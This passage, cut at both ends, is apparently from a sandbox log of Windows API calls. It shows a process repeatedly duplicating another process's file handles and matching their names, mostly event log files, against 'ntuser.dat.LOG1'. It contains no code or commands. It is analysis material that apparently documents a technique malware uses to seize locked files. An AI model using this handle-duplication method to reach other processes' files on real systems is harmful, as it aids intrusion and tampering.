(dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.643] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x204, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.643] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.644] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.645] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.646] CloseHandle (hObject=0x670) returned 1 [0151.646] _wcsicmp (_Str1="\\Security.evtx", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.646] CloseHandle (hObject=0x680) returned 1 [0151.646] CloseHandle (hObject=0x62c) returned 1 [0151.646] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.646] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x210, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.646] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.647] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.648] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.648] CloseHandle (hObject=0x670) returned 1 [0151.648] _wcsicmp (_Str1="\\Windows PowerShell.evtx", _Str2="\\ntuser.dat.LOG1") returned 9 [0151.648] CloseHandle (hObject=0x680) returned 1 [0151.648] CloseHandle (hObject=0x62c) returned 1 [0151.648] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.648] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x214, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.648] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.649] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.650] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.650] CloseHandle (hObject=0x670) returned 1 [0151.650] _wcsicmp (_Str1="\\OAlerts.evtx", _Str2="\\ntuser.dat.LOG1") returned 1 [0151.650] CloseHandle (hObject=0x680) returned 1 [0151.650] CloseHandle (hObject=0x62c) returned 1 [0151.650] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.651] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x218, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.651] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.652] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.654] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.654] CloseHandle (hObject=0x670) returned 1 [0151.654] _wcsicmp (_Str1="\\Media Center.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.654] CloseHandle (hObject=0x680) returned 1 [0151.654] CloseHandle (hObject=0x62c) returned 1 [0151.654] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.654] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x21c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.654] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.655] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.656] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.656] CloseHandle (hObject=0x670) returned 1 [0151.656] _wcsicmp (_Str1="\\Key Management Service.evtx", _Str2="\\ntuser.dat.LOG1") returned -3 [0151.656] CloseHandle (hObject=0x680) returned 1 [0151.657] CloseHandle (hObject=0x62c) returned 1 [0151.657] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.657] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x224, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.657] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.657] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.659] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.659] CloseHandle (hObject=0x670) returned 1 [0151.659] _wcsicmp (_Str1="\\HardwareEvents.evtx", _Str2="\\ntuser.dat.LOG1") returned -6 [0151.659] CloseHandle (hObject=0x680) returned 1 [0151.659] CloseHandle (hObject=0x62c) returned 1 [0151.659] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.659] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x228, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.659] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.661] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.662] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.662] CloseHandle (hObject=0x670) returned 1 [0151.662] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.662] CloseHandle (hObject=0x680) returned 1 [0151.662] CloseHandle (hObject=0x62c) returned 1 [0151.662] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.662] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x22c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.662] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.663] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.664] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.664] CloseHandle (hObject=0x670) returned 1 [0151.664] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.664] CloseHandle (hObject=0x680) returned 1 [0151.664] CloseHandle (hObject=0x62c) returned 1 [0151.664] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.664] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.664] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.665] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.666] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.666] CloseHandle (hObject=0x670) returned 1 [0151.666] CloseHandle (hObject=0x680) returned 1 [0151.666] CloseHandle (hObject=0x62c) returned 1 [0151.666] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.666] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.666] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.667] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.668] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.668] CloseHandle (hObject=0x670) returned 1 [0151.668] CloseHandle (hObject=0x680) returned 1 [0151.668] CloseHandle (hObject=0x62c) returned 1 [0151.668] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.668] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x314, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.668] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.670] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.671] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.671] CloseHandle (hObject=0x670) returned 1 [0151.672] CloseHandle (hObject=0x680) returned 1 [0151.672] CloseHandle (hObject=0x62c) returned 1 [0151.672] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.672] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x318, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.672] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.673] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.674] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.674] CloseHandle (hObject=0x670) returned 1 [0151.674] CloseHandle (hObject=0x680) returned 1 [0151.674] CloseHandle (hObject=0x62c) returned 1 [0151.674] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.674] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x35c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.674] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.675] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.676] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.676] CloseHandle (hObject=0x670) returned 1 [0151.676] CloseHandle (hObject=0x680) returned 1 [0151.676] CloseHandle (hObject=0x62c) returned 1 [0151.676] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.676] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x40c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.676] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.677] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.686] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.686] CloseHandle (hObject=0x670) returned 1 [0151.686] CloseHandle (hObject=0x680) returned 1 [0151.686] CloseHandle (hObject=0x62c) returned 1 [0151.686] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.686] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x474, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.686] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.686] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.688] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.688] CloseHandle (hObject=0x670) returned 1 [0151.688] _wcsicmp (_Str1="\\Microsoft-Windows-ReadyBoost%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.688] CloseHandle (hObject=0x680) returned 1 [0151.688] CloseHandle (hObject=0x62c) returned 1 [0151.688] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.688] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.689] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.689] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.690] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.690] CloseHandle (hObject=0x670) returned 1 [0151.690] _wcsicmp (_Str1="\\Microsoft-Windows-GroupPolicy%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.690] CloseHandle (hObject=0x680) returned 1 [0151.690] CloseHandle (hObject=0x62c) returned 1 [0151.690] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.690] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.691] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.691] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.692] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.693] CloseHandle (hObject=0x670) returned 1 [0151.693] _wcsicmp (_Str1="\\Microsoft-Windows-Dhcp-Client%4Admin.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.693] CloseHandle (hObject=0x680) returned 1 [0151.693] CloseHandle (hObject=0x62c) returned 1 [0151.693] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.693] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.693] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.694] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.695] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.695] CloseHandle (hObject=0x670) returned 1 [0151.695] _wcsicmp (_Str1="\\Microsoft-Windows-OfflineFiles%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.695] CloseHandle (hObject=0x680) returned 1 [0151.695] CloseHandle (hObject=0x62c) returned 1 [0151.696] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.696] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.696] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.696] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.697] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.697] CloseHandle (hObject=0x670) returned 1 [0151.697] _wcsicmp (_Str1="\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.697] CloseHandle (hObject=0x680) returned 1 [0151.698] CloseHandle (hObject=0x62c) returned 1 [0151.698] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.698] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.698] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.698] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.699] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.699] CloseHandle (hObject=0x670) returned 1 [0151.700] _wcsicmp (_Str1="\\Microsoft-Windows-Winlogon%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.700] CloseHandle (hObject=0x680) returned 1 [0151.700] CloseHandle (hObject=0x62c) returned 1 [0151.700] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.700] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.700] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.700] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.701] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.702] CloseHandle (hObject=0x670) returned 1 [0151.702] _wcsicmp (_Str1="\\Microsoft-Windows-User Profile Service%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.702] CloseHandle (hObject=0x680) returned 1 [0151.702] CloseHandle (hObject=0x62c) returned 1 [0151.702] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.702] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.702] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.703] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.704] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.704] CloseHandle (hObject=0x670) returned 1 [0151.704] _wcsicmp (_Str1="\\Microsoft-Windows-BranchCacheSMB%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.704] CloseHandle (hObject=0x680) returned 1 [0151.704] CloseHandle (hObject=0x62c) returned 1 [0151.704] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.704] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4e4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.704] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.705] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.706] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.706] CloseHandle (hObject=0x670) returned 1 [0151.706] _wcsicmp (_Str1="\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.706] CloseHandle (hObject=0x680) returned 1 [0151.706] CloseHandle (hObject=0x62c) returned 1 [0151.706] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.706] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.706] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.707] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.708] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.708] CloseHandle (hObject=0x670) returned 1 [0151.709] _wcsicmp (_Str1="\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.709] CloseHandle (hObject=0x680) returned 1 [0151.709] CloseHandle (hObject=0x62c) returned 1 [0151.709] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.709] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.709] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.710] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.711] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.711] CloseHandle (hObject=0x670) returned 1 [0151.711] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.711] CloseHandle (hObject=0x680) returned 1 [0151.711] CloseHandle (hObject=0x62c) returned 1 [0151.711] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.711] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x598, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.711] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.712] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.713] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.713] CloseHandle (hObject=0x670) returned 1 [0151.713] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.713] CloseHandle (hObject=0x680) returned 1 [0151.713] CloseHandle (hObject=0x62c) returned 1 [0151.713] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.714] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.714] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.714] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.716] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.716] CloseHandle (hObject=0x670) returned 1 [0151.716] _wcsicmp (_Str1="\\Microsoft-Windows-NCSI%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.716] CloseHandle (hObject=0x680) returned 1 [0151.716] CloseHandle (hObject=0x62c) returned 1 [0151.716] OpenProcess 